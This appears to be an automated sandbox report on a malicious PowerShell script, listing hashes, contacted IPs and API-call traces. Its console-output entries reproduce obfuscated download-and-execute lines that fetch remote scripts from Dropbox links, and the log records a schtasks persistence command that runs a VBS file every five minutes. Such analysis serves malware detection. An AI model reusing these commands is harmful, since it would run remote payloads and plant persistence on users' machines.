Summary | ZeroBOX

script.ps1

Generic Malware Antivirus
Category Machine Started Completed
FILE s1_win7_x6401 March 28, 2023, 8:13 a.m. March 28, 2023, 8:19 a.m.
Size 434.0B
Type ASCII text, with CRLF line terminators
MD5 ab5fc61f3bff95a184793280a69fb709
SHA256 d71c0385451cfecea5be9e79d0bf567b2d9f72783481e7293023dafbdf4478ba
CRC32 10E4D2EB
ssdeep 6:jt2c0eG1zD5mNkSSLy6ewjt2cw1zD5abdkt9EEt8US9t2cc7FKbVFG+IUvsQmmuv:jZoUkhLy6ew9MydktzSnZF+nCde
Yara None matched

IP Address Status Action
162.125.84.15 Active Moloch
164.124.101.2 Active Moloch
45.33.6.223 Active Moloch

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: Exception calling "DownloadString" with "1" argument(s): "The underlying connec
console_handle: 0x00000023
1 1 0

WriteConsoleW

buffer: tion was closed: An unexpected error occurred on a send."
console_handle: 0x0000002f
1 1 0

WriteConsoleW

buffer: At C:\Users\test22\AppData\Local\Temp\script.ps1:2 char:56
console_handle: 0x0000003b
1 1 0

WriteConsoleW

buffer: + i'e'x ((New-Object System.Net.WebClient).DownloadString <<<< ('https://dl.dro
console_handle: 0x00000047
1 1 0

WriteConsoleW

buffer: pbox.com/s/hcng2wn7gd3f1y3/codeexe.ps1?dl=0'))
console_handle: 0x00000053
1 1 0

WriteConsoleW

buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
console_handle: 0x0000005f
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : DotNetMethodException
console_handle: 0x0000006b
1 1 0

WriteConsoleW

buffer: Exception calling "DownloadString" with "1" argument(s): "The underlying connec
console_handle: 0x0000008b
1 1 0

WriteConsoleW

buffer: tion was closed: An unexpected error occurred on a send."
console_handle: 0x00000097
1 1 0

WriteConsoleW

buffer: At C:\Users\test22\AppData\Local\Temp\script.ps1:6 char:56
console_handle: 0x000000a3
1 1 0

WriteConsoleW

buffer: + i'e'x ((New-Object System.Net.WebClient).DownloadString <<<< ('https://DL.dro
console_handle: 0x000000af
1 1 0

WriteConsoleW

buffer: pbox.com/s/1uxmv7mp56cq1kn/bypass.ps1?dl=0'))
console_handle: 0x000000bb
1 1 0

WriteConsoleW

buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
console_handle: 0x000000c7
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : DotNetMethodException
console_handle: 0x000000d3
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x05020d58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x05020d58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x05020d58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x05020d58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x05020d58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x05020d58
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2544
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x022ab000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2544
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x022bf000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2544
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02249000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2544
region_size: 327680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef40000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2544
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef40000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2544
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef40000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2544
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef30000
allocation_type: 1056768 (MEM_RESERVE|MEM_TOP_DOWN)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2544
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7ef30000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2544
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05790000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2544
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x057e0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2544
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a62000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2544
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x022b9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2544
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a63000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2544
region_size: 262144
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x062f0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2544
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x062f0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2544
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x062f1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2544
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x062f2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2544
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x062f3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2544
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x062f4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2544
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x062f5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2544
region_size: 16384
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x062f6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2544
region_size: 69632
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x062fa000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2544
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0630b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2544
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0630c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2544
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0630d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2544
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05791000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2544
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05792000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2544
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05793000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2544
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05794000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2544
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05795000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2544
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x057e1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
cmdline "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 5 /tn TinyTaskmat /tr C:\Users\Public\clayemat.VBS
domain dl.dropbox.com
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Data received 
Data received F
Data sent qmd"#hî¡c4²›€•¿ŸÒ’ð[šFp«‰âó|ö+±/5 ÀÀÀ À 28,ÿdl.dropbox.com  
Data sent qmd"#hÑãÑ&”r[õV2Rº à:Š=#^®U¥-/5 ÀÀÀ À 28,ÿdl.dropbox.com  
Data sent qmd"#s˜ûãíB£¸)èÍ3¦xQÓ)ûAh;;–iÉÄ/5 ÀÀÀ À 28,ÿdl.dropbox.com  
Data sent qmd"#sъî¡AO8­Wõf`ÝÚ¨³ >Æ0¼»æ/5 ÀÀÀ À 28,ÿdl.dropbox.com  
cmdline "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 5 /tn TinyTaskmat /tr C:\Users\Public\clayemat.VBS
host 45.33.6.223
cmdline "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 5 /tn TinyTaskmat /tr C:\Users\Public\clayemat.VBS
Time & API Arguments Status Return Repeated

send

buffer: qmd"#hî¡c4²›€•¿ŸÒ’ð[šFp«‰âó|ö+±/5 ÀÀÀ À 28,ÿdl.dropbox.com  
socket: 1384
sent: 118
1 118 0

send

buffer: qmd"#hÑãÑ&”r[õV2Rº à:Š=#^®U¥-/5 ÀÀÀ À 28,ÿdl.dropbox.com  
socket: 1384
sent: 118
1 118 0

send

buffer: qmd"#s˜ûãíB£¸)èÍ3¦xQÓ)ûAh;;–iÉÄ/5 ÀÀÀ À 28,ÿdl.dropbox.com  
socket: 1512
sent: 118
1 118 0

send

buffer: qmd"#sъî¡AO8­Wõf`ÝÚ¨³ >Æ0¼»æ/5 ÀÀÀ À 28,ÿdl.dropbox.com  
socket: 1512
sent: 118
1 118 0
parent_process powershell.exe martian_process "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 5 /tn TinyTaskmat /tr C:\Users\Public\clayemat.VBS
file C:\Windows\System32\schtasks.exe